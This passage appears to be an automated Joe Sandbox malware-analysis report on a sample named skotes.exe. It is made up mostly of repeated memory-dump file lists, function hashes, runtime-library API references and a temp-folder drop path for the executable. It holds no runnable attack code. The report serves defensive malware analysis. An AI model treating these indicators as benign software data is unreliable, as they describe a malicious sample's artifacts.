                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3281396844-0
                                                                                                                                                                                            • Opcode ID: daf92d0d21f236591094ef457cbe013d2c4ebe3c3e07261c5ca6957b40f809a3
                                                                                                                                                                                            • Instruction ID: 88f444507453a1a47340593755155da587a255f4efa7439374c0545a0bcb4d3e
                                                                                                                                                                                            • Opcode Fuzzy Hash: daf92d0d21f236591094ef457cbe013d2c4ebe3c3e07261c5ca6957b40f809a3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 49316936902A66DFCB54EFA4E9816DDB7B2BF14318F28406ED80177652CB31AD04CF98
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006318A4
                                                                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 006318EB
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                            • String ID: pContext
                                                                                                                                                                                            • API String ID: 3390424672-2046700901
                                                                                                                                                                                            • Opcode ID: 9f776555ad1738a297c643d2eb87f19a9acf4a36e3c2317eeef5fdaa796b6af9
                                                                                                                                                                                            • Instruction ID: 422e124d8a07db57c069010f49c98bdf414390e98ab10e64d80f6d389c598ab4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f776555ad1738a297c643d2eb87f19a9acf4a36e3c2317eeef5fdaa796b6af9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C21E535B006159BCB14AB68D895AFDB3A7BF96334F04012AE4118B3D1CBB4E9428AD8
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 0063DFE8
                                                                                                                                                                                            • 6c, xrefs: 0063E034
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 6c$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                            • API String ID: 0-1795404442
                                                                                                                                                                                            • Opcode ID: 74029dcd9ec177b409cd406918f1cbb9da04039de9cb1c1feb4fe8c2af28461f
                                                                                                                                                                                            • Instruction ID: 3c70f3d43a283e86b2dcf4aa34945515a304425c9b1a67b684bbd59c04a2c5e3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 74029dcd9ec177b409cd406918f1cbb9da04039de9cb1c1feb4fe8c2af28461f
                                                                                                                                                                                            • Instruction Fuzzy Hash: C221927160420DAFDB78AE659C80EAB77AFEF10364F104518F924962D1EBB2EC1087F0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • List.LIBCONCRT ref: 0062AEEA
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0062AF0F
                                                                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0062AF4E
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                                                                            • String ID: pExecutionResource
                                                                                                                                                                                            • API String ID: 1772865662-359481074
                                                                                                                                                                                            • Opcode ID: 0b19d28806ce126890bf0f624ea8d316ca591a8f68f0dd1e5ed76f6e4ebc8c47
                                                                                                                                                                                            • Instruction ID: 0790657b4375e0c48a3820fc76911280d26ca420cc7355237ada6781fbe6aa5a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b19d28806ce126890bf0f624ea8d316ca591a8f68f0dd1e5ed76f6e4ebc8c47
                                                                                                                                                                                            • Instruction Fuzzy Hash: EA21D571A402059BCB48EFA4C982BEDB7A7BF48310F14406DE501AB382DBB0AE44CB95
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00624F24
                                                                                                                                                                                            • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00624F66
